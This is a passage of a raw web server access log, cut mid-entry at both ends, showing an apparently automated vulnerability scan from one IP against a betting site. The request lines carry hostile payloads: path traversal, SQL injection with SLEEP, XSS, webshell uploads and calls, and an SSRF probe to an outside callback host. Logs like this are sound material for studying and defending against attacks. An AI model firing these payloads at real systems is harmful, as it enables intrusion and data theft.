-0400] "GET /images/..%2finfo.html HTTP/1.1" 200 0 "https://mgrokokbet.id/info.html" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:29:21 -0400] "GET /images/..%2finfo.html HTTP/1.1" 200 0 "https://mgrokokbet.id/info.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:06:29:29 -0400] "GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1" 200 0 "https://mgrokokbet.id/info.html" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - 
[24/Apr/2025:06:30:12 -0400] "POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:30:14 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:06:30:23 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:32:08 -0400] "POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:32:21 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:32:22 -0400] "POST /adminer/adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:06:32:22 -0400] "POST /_adminer/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:32:22 -0400] "POST /_adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.25" 154.84.62.234 - - [24/Apr/2025:06:32:22 -0400] "POST /adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:06:32:22 -0400] "POST 
/adminer/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:32:22 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:32:38 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:33:13 -0400] "POST /wp-json/buddypress/v1/signup HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:33:30 -0400] "GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1" 200 0 "http://interact.sh/127.0.0.1.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:33:48 -0400] "GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:06:34:15 -0400] "POST /casa/nodes/thumbprints HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:34:18 -0400] "POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1" 403 1242 "https://mgrokokbet.id" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:34:19 -0400] "POST /auth/realms/master/clients-registrations/default HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:34:25 -0400] "POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/618.5.10 (KHTML, like Gecko) Version/17.5 Safari/618.5.10" 154.84.62.234 - - [24/Apr/2025:06:34:31 -0400] "POST /realms/master/clients-registrations/default HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.23" 154.84.62.234 - - [24/Apr/2025:06:34:33 -0400] "POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:34:37 -0400] "POST /realms/master/clients-registrations/openid-connect HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.24" 154.84.62.234 - - [24/Apr/2025:06:34:40 -0400] "POST /lucee/admin/imgProcess.cfm?file=/../../../context/2w9rfSNLfXIxqzXBKDgEEw2brEL.cfm HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; rv:128.0 ) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:06:34:46 -0400] "POST /lucee/2w9rfSNLfXIxqzXBKDgEEw2brEL.cfm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - user [24/Apr/2025:06:34:51 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.27" 154.84.62.234 - admin [24/Apr/2025:06:34:58 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:35:11 -0400] "POST 
/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:36:51 -0400] "POST /_bulk HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0" 154.84.62.234 - - [24/Apr/2025:06:36:51 -0400] "POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:06:37:12 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:37:15 -0400] "POST /AdminService/urest/v1/LogonResource HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:06:37:19 -0400] "POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:38:21 -0400] "GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:06:38:41 -0400] "POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:38:58 -0400] "GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\" HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - admin [24/Apr/2025:06:39:30 -0400] "POST /mgmt/shared/authn/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 
10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:39:43 -0400] "GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:40:41 -0400] "GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:40:41 -0400] "GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:40:58 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22" 154.84.62.234 - - [24/Apr/2025:06:41:30 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.34" 154.84.62.234 - - [24/Apr/2025:06:41:35 -0400] "POST /wp-comments-post.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_7_3; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:41:45 -0400] "GET /wp-content/plugins/imagements/images/2w9rfehwcgxo7sxvwsefzfmtvkl.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:06:42:55 -0400] "POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0" 154.84.62.234 - - [24/Apr/2025:06:43:02 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" 154.84.62.234 - - 
[24/Apr/2025:06:43:09 -0400] "GET /wp-content/uploads/kaswara/fonts_icon/aekvtn/ru.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:43:43 -0400] "GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:06:44:25 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.16" 154.84.62.234 - - [24/Apr/2025:06:44:31 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:44:54 -0400] "GET /wp-content/themes/jnews/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:44:58 -0400] "GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:06:45:09 -0400] "GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0" 154.84.62.234 - - [24/Apr/2025:06:45:10 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:45:17 -0400] "GET /wp-content/themes/bello/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:06:46:44 -0400] "GET /?author=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4) AppleWebKit/616.33 (KHTML, like Gecko) Version/17.6 Safari/616.33" 
154.84.62.234 - - [24/Apr/2025:06:46:53 -0400] "GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:47:10 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:06:47:45 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:06:47:56 -0400] "POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:48:22 -0400] "GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:49:24 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:06:49:31 -0400] "GET /wp-content/uploads/workreap-temp/2w9rfeXhYfyde1c0MNSgGFOFtaE.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 149.40.52.203 - - [24/Apr/2025:06:50:44 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131" 149.40.52.203 - - [24/Apr/2025:06:50:47 
-0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131" 149.40.52.203 - - [24/Apr/2025:06:50:51 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131" 154.84.62.234 - - [24/Apr/2025:06:51:22 -0400] "POST /wp-json/pie/v1/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:51:41 -0400] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:06:51:44 -0400] "GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:06:52:03 -0400] "GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:52:20 -0400] "GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:52:20 -0400] "GET /wp-content/plugins/elementor/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:52:38 -0400] "POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) 
Gecko/20100101 Firefox/79.0" 154.84.62.234 - - [24/Apr/2025:06:52:42 -0400] "GET /wp-admin/options.php HTTP/1.1" 200 0 "something" "Mozilla/5.0 (Fedora; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:52:52 -0400] "GET /wp-admin/profile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:53:05 -0400] "GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:54:11 -0400] "POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:54:20 -0400] "GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:57:35 -0400] "GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:58:45 -0400] "GET /wp-content/plugins/wpcargo/includes/2w9rfT0cIMzbpO1CBc2Wxws2Vq5.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:58:45 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) 
AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:58:42 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:58:51 -0400] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2w9rfT0cIMzbpO1CBc2Wxws2Vq5.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" 154.84.62.234 - - [24/Apr/2025:06:58:57 -0400] "POST /wp-content/plugins/wpcargo/includes/2w9rfT0cIMzbpO1CBc2Wxws2Vq5.php?1=var_dump HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:00:14 -0400] "POST /run HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:00:30 -0400] "GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:00:37 -0400] "GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:01:18 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:01:26 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Windows NT 10.0; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:07:01:34 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:01:34 -0400] "POST /druid/indexer/v1/sampler HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:02:16 -0400] "POST /AurallRECMonitor/services/svc-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:07:02:21 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /users/user-dark-features HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /confluence/pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.18" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /wiki/pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST 
